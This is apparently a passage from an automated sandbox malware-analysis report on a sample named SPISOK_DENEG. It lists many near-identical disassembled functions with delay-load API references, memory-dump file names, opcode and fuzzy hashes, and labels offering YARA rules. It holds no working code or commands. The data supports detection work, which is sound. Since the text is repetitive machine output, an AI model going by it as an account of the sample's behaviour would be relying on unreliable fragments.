                                                            • Opcode ID: 34d1efb58842acbe114a2710717418b0ba19411e7ddbb1685e99bf8c6064028e
                                                            • Instruction ID: f24e0ef7a6912034bae8b31a2295f70542a51dd80dc08494f1b1f8d23e961473
                                                            • Opcode Fuzzy Hash: 34d1efb58842acbe114a2710717418b0ba19411e7ddbb1685e99bf8c6064028e
                                                            • Instruction Fuzzy Hash: 21B092A53581C8ACB14852069E02C3A010CC280B12320822AB819E01C1AA8068880871
                                                            Function 000EE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3fe05fbdf08f11c86f1af960dcfe5a947414312fdf81886d8a448b9f5ccaf8b6
                                                            • Instruction ID: b194f7fdd89c056287445fb00588cdc33eec95e05d29127cf51340156f25eead
                                                            • Opcode Fuzzy Hash: 3fe05fbdf08f11c86f1af960dcfe5a947414312fdf81886d8a448b9f5ccaf8b6
                                                            • Instruction Fuzzy Hash: 50B092B52580C4ACA10852069E02C3A011CC281B11320812AB819E0081AA80A9440871
                                                            Function 000EE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ad7147038cbf5d21dc9c312e63cece5d1b8adc5bc94f7d03f8ddc5134520540f
                                                            • Instruction ID: 45a0d8106c46a80fe567e81ab8e99b9fb17b11097e48e79798a84290ecdeab66
                                                            • Opcode Fuzzy Hash: ad7147038cbf5d21dc9c312e63cece5d1b8adc5bc94f7d03f8ddc5134520540f
                                                            • Instruction Fuzzy Hash: 00B092B52581C4ACA14852069E02C3A011CC280B12320822AB819E0081AA8069840871
                                                            Function 000EE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 196b8747ef9e65a167eb9c1742e0534e467e2c20eb847bd0c9c69bcfa7ba7e62
                                                            • Instruction ID: 6f1eeb6d62dc1c85ffd414db4d52edc356c18aaf1a417a6f765da02951c4e85f
                                                            • Opcode Fuzzy Hash: 196b8747ef9e65a167eb9c1742e0534e467e2c20eb847bd0c9c69bcfa7ba7e62
                                                            • Instruction Fuzzy Hash: 22B012F53580C4ACF10852079E02C3B011CC2C0F11330813EF819F00C1EE806D440C71
                                                            Function 000EE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7877904f207f2dbe9f240fa4f440ecc7fb4d2de8f7e31462d4ed3f312c0fc0d2
                                                            • Instruction ID: 1086bf66bbdad62155eaee93bdfc109679c39e7bc0938c82109c5bc1111d6998
                                                            • Opcode Fuzzy Hash: 7877904f207f2dbe9f240fa4f440ecc7fb4d2de8f7e31462d4ed3f312c0fc0d2
                                                            • Instruction Fuzzy Hash: 79B012F53580C4ACF10852079F02C3B011CC2C0F11330813EF819F00C1EE806E851C71
                                                            Function 000EE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d5bae7b11648bc9c378fd402816d36acd961480f8009ad99b277263ae2b844a7
                                                            • Instruction ID: d9da80aa22e8db0c13b9c2ead17c23a5fc7d22bd5a371a8dc1e9c596561220a8
                                                            • Opcode Fuzzy Hash: d5bae7b11648bc9c378fd402816d36acd961480f8009ad99b277263ae2b844a7
                                                            • Instruction Fuzzy Hash: ADB012F53590C4ACF10852079E02C3B010DC2C1B21730C13EFC19E00C1EE80AC440C71
                                                            Function 000EE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 124a544d965d588dc1b4e8ecec06c41000a0083cf2f0472c82021f9ed218a6c8
                                                            • Instruction ID: dc89b64b996b16245bb1a019760a687fdc9a3a2e14e0fbe559dc44c8e338feed
                                                            • Opcode Fuzzy Hash: 124a544d965d588dc1b4e8ecec06c41000a0083cf2f0472c82021f9ed218a6c8
                                                            • Instruction Fuzzy Hash: B5B012F53591C4BCF14853079E02C3B010DC2C0B22730823EF819E00C1EEC06C880C71
                                                            Function 000EE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 505643937204d49923b9c597dad2da78139de360fd9396bb348eb667faefaa3b
                                                            • Instruction ID: 546ec05f493b58c5bdde1d5c564f3677ad4f9e6ec3a31c9c41b27cafd73f2e85
                                                            • Opcode Fuzzy Hash: 505643937204d49923b9c597dad2da78139de360fd9396bb348eb667faefaa3b
                                                            • Instruction Fuzzy Hash: 49B012F53580C4ACF10852179E02C3B014CC2C1B11330C13EFC19E00C1EF80AC440C71
                                                            Function 000EE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3f60bd73e2cb53af2c6cf2a2c111c4d16895c14be148a989f4c76a8b0d20d89f
                                                            • Instruction ID: 6d7d65a68eb26578fcd061b4ea80e2ccdf16d6410b3b411317d915b27b308d5f
                                                            • Opcode Fuzzy Hash: 3f60bd73e2cb53af2c6cf2a2c111c4d16895c14be148a989f4c76a8b0d20d89f
                                                            • Instruction Fuzzy Hash: 8EB012F53690C4ACF10852079E02C3B014DC6C0B21730813EF85AE00C1EE806C440C71
                                                            Function 000EE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bacf7e79395b081f0472598c21d3f24c404aa169fbf9a9e64f7aadb319c7cb3c
                                                            • Instruction ID: c8b975bc5606b8222114c699b6a1466ac7e788819d0c16d442c42eab3121ff6d
                                                            • Opcode Fuzzy Hash: bacf7e79395b081f0472598c21d3f24c404aa169fbf9a9e64f7aadb319c7cb3c
                                                            • Instruction Fuzzy Hash: 8CB012F53580C4ACF10852079F02C3B018CC2C0B11730813EF819E00C1EF806D851C71
                                                            Function 000EEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EEAF9
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4a1e0fb561da94a142852146e00b098f1c635e8464bfb67290d468b01eb01324
                                                            • Instruction ID: 6e19f6d2caabbd758fcf77027a723ef2140fbca65afc3e42ff56544047ead24f
                                                            • Opcode Fuzzy Hash: 4a1e0fb561da94a142852146e00b098f1c635e8464bfb67290d468b01eb01324
                                                            • Instruction Fuzzy Hash: 1BB012E639A0CA7CF11863029F42C3B010CC2C0BA0330813EF418F40C2DEC15C450872
                                                            Function 000EE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e1b0616f1d1373885ab409880a59f6fd510b4d3cd63fa23e487c01e3426d778c
                                                            • Instruction ID: 460b2d2b82ea4be1e1d36206a85cffea67c481361fb22e3ad5274a8eaa8c6d4a
                                                            • Opcode Fuzzy Hash: e1b0616f1d1373885ab409880a59f6fd510b4d3cd63fa23e487c01e3426d778c
                                                            • Instruction Fuzzy Hash: AFB092A12580C4ACF12852169A06CBB0218C280B10330822AB518E11C19A8109490872
                                                            Function 000EE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 027274604e17264a468ede594b4d7735b8a76fa78da63d3d70d995cfa3619837
                                                            • Instruction ID: 0c1b7b8e9ba65b203de877afe26f625bf6ea44d8f053aebae7994838bc092057
                                                            • Opcode Fuzzy Hash: 027274604e17264a468ede594b4d7735b8a76fa78da63d3d70d995cfa3619837
                                                            • Instruction Fuzzy Hash: 36B012F13580C4BCF12892169E06C7B021CC2C0F10330822EF818F11C1DE804F040C73
                                                            Function 000EE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a2e14eb07265f166b915bc4095c63fdb75fa37e978d275d865ba696b1fe0b1cc
                                                            • Instruction ID: 00d38e2f9dea98b13b8f370aba6f57983fa8f0bf77d53bb0196f0473b3f4c06e
                                                            • Opcode Fuzzy Hash: a2e14eb07265f166b915bc4095c63fdb75fa37e978d275d865ba696b1fe0b1cc
                                                            • Instruction Fuzzy Hash: 94B092A12580C4ACF12892169A06C7B0218C280B10330822AB818E11C1DA8049080872
                                                            Function 000EE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cfe520577560b2f1e3edf02f077536bb65271945eff0bd2694fdadc7e8a86615
                                                            • Instruction ID: 87cdc6336b05242a9aa9c5af3a5816a6715049e14e6efc830b5593d9f714952e
                                                            • Opcode Fuzzy Hash: cfe520577560b2f1e3edf02f077536bb65271945eff0bd2694fdadc7e8a86615
                                                            • Instruction Fuzzy Hash: C2B012D22598C47CF11812269F06D3F010CC2C1F10B30413EF4A4F04C2AE800D080871
                                                            Function 000EE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
